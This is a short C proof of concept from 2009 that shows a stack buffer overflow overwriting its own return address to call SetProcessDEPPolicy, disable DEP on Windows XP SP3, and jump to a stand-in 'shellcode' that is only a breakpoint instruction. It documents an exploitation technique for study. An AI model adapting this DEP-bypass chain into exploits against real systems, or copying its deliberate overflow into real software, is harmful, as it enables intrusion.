Bernardo
Dec 9th, 2009
/*
This is a proof of concept of buffer overflow exploitation with DEP
bypass on Windows XP Professional SP3 English, updated on December 9,
2009, with DEP manually set to OptOut, so enabled for all processes
except the ones that are put in the exception list, which this program
is not.

This source has been compiled with Microsoft Visual C++ 2008 Express
Edition in Release mode with the default flags. This includes
/NXCOMPAT and /GS.

Buffer Security Check (stack cookie, /GS flag) does not need to be
bypassed because the string buffer, buf, in this example is 4 bytes
long, so the compiler does not add the GS cookie to the
useSetProcessDEPPolicy() function. Remember that the strict_gs_check
pragma is turned off by default.

References:
* 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
  Server 2008' by Michael Howard,
  http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
* SetProcessDEPPolicy Function,
  http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx

Feel free to write me for comments and questions,
Bernardo Damele A. G. <[email protected]>
*/


#include <windows.h>
#include <stdlib.h>
#include <string.h>   /* strcpy() and memcpy() */


void useSetProcessDEPPolicy(void)
{
    char buf[4];

    /* Overflow the string buffer and the saved EBP register. */
    strcpy(buf, "AAAABBBB");

    /* The SetProcessDEPPolicy() API has been added to Windows Vista SP1,
    Windows XP SP3 and Windows Server 2008 and can be abused by an
    attacker while exploiting a buffer overflow vulnerability to disable
    hardware-enforced DEP (NX/XD bit) for the running process.

    Overwrite EIP (the saved return address) with the address of
    SetProcessDEPPolicy(), which is 0x7c8622a4 on a Windows XP SP3
    English 32-bit system updated on December 9, 2009.

    NOTE: You might need to adapt it depending on your system patch
    level. */
    memcpy(buf+8, "\xa4\x22\x86\x7c", 4);

    /* Return address for SetProcessDEPPolicy().
    Use the address of a JMP ESP instruction in kernel32.dll to jump to our
    shellcode on the top of the stack.

    NOTE: You might need to adapt it depending on your system patch
    level. */
    memcpy(buf+12, "\x13\x44\x87\x7c", 4);

    /* Argument for SetProcessDEPPolicy().
    0x00000000 turns off DEP for this process. */
    memcpy(buf+16, "\x00\x00\x00\x00", 4);

    /* The shellcode to be executed after DEP has been disabled.
    For instance, a breakpoint (INT 3 instruction) to call the
    debug exception handler, which will pause the process. */
    memcpy(buf+20, "\xcc", 1);
}


int main(void)
{
    useSetProcessDEPPolicy();

    return 0;
}